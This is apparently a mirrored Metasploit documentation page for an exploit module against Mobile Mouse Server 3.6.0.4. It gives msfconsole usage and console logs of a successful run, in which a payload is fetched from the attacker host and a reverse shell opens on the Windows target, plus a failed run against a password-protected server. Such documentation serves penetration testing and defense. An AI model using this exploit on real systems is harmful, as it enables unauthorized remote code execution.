CoCalc -- mobile_mouse

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
Path: blob/master/documentation/modules/exploit/windows/misc/mobile_mouse_rce.md
Views: ¹⁹⁰⁴

Vulnerable Application

This module utilizes the Mobile Mouse Server by RPA Technologies, Inc protocol to deploy a payload and run it from the server. This module will only deploy a payload if the server is set without a password (default). Tested against 3.6.0.4, current at the time of module writing

Version 3.6.0.4 can be downloaded from https://www.mobilemouse.com/downloads/setup.exe

Verification Steps

Install the application
Start msfconsole
Do: use exploit/windows/misc/mobile_mouse_rce
Set rhost and lhost as required.
Do: run
You should get a shell as the user who is running Mobile Mouse.

Options

SLEEP

The length of time, in seconds, to sleep between each command. This gives the remote program time to process the command on screen. Defaults to 3, but can be a little touchy.

Scenarios

Mobile Mouse 3.6.0.4 on Windows 10

resource (mobile_mouse.rb)> use exploits/windows/misc/mobile_mouse_rce
[*] Using configured payload windows/shell/reverse_tcp
resource (mobile_mouse.rb)> set rhosts 1.1.1.1
rhosts => 1.1.1.1
resource (mobile_mouse.rb)> set lhost 2.2.2.2
lhost => 2.2.2.2
resource (mobile_mouse.rb)> set verbose true
verbose => true
msf6 exploit(windows/misc/mobile_mouse_rce) > run

[*] Started reverse TCP handler on 2.2.2.2:4444 
[*] 1.1.1.1:9099 - Client name set to: M6braOok6j
[*] 1.1.1.1:9099 - Connecting
[+] 1.1.1.1:9099 - Connected to hostname WIN10PROLICENSE with MAC address 00:0C:29:B3:68:3D
[*] 1.1.1.1:9099 - Opening Command Prompt
[*] 1.1.1.1:9099 - Sending stager
[*] 1.1.1.1:9099 - Using URL: http://2.2.2.2:8080/
[+] 1.1.1.1:9099 - Payload request received, sending 73802 bytes of payload for staging
[*] 1.1.1.1:9099 - Opening Command Prompt again
[+] 1.1.1.1:9099 - Payload request received, sending 73802 bytes of payload for staging
[*] 1.1.1.1:9099 - Executing payload
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 1.1.1.1
[*] Command shell session 1 opened (2.2.2.2:4444 -> 1.1.1.1:49696) at 2022-09-26 15:40:03 -0400
[*] 1.1.1.1:9099 - Server stopped.
[!] 1.1.1.1:9099 - This exploit may require manual cleanup of 'c:\Windows\Temp\gxYUnChTLrOuA.exe' on the target


Shell Banner:
Microsoft Windows [Version 10.0.16299.125]
-----
          

C:\Windows\Temp>whoami
whoami
win10prolicense\windows

C:\Windows\Temp>systeminfo
systeminfo

Host Name:                 WIN10PROLICENSE
OS Name:                   Microsoft Windows 10 Pro
OS Version:                10.0.16299 N/A Build 16299

Mobile Mouse 3.6.0.4 on Windows 10, with a password

This should fail as the exploit was not written to work with a password.

resource (mobile_mouse.rb)> use exploits/windows/misc/mobile_mouse_rce
[*] Using configured payload windows/shell/reverse_tcp
resource (mobile_mouse.rb)> set rhosts 1.1.1.1
rhosts => 1.1.1.1
resource (mobile_mouse.rb)> set lhost 2.2.2.2
lhost => 2.2.2.2
resource (mobile_mouse.rb)> set verbose true
verbose => true
msf6 exploit(windows/misc/mobile_mouse_rce) > run

[*] Started reverse TCP handler on 2.2.2.2:4444 
[*] 1.1.1.1:9099 - Client name set to: baqpHBHh5Q
[*] 1.1.1.1:9099 - Connecting
[-] 1.1.1.1:9099 - Exploit aborted due to failure: no-access: Unable to connect, server response: Please enter a password
[*] Exploit completed, but no session was created.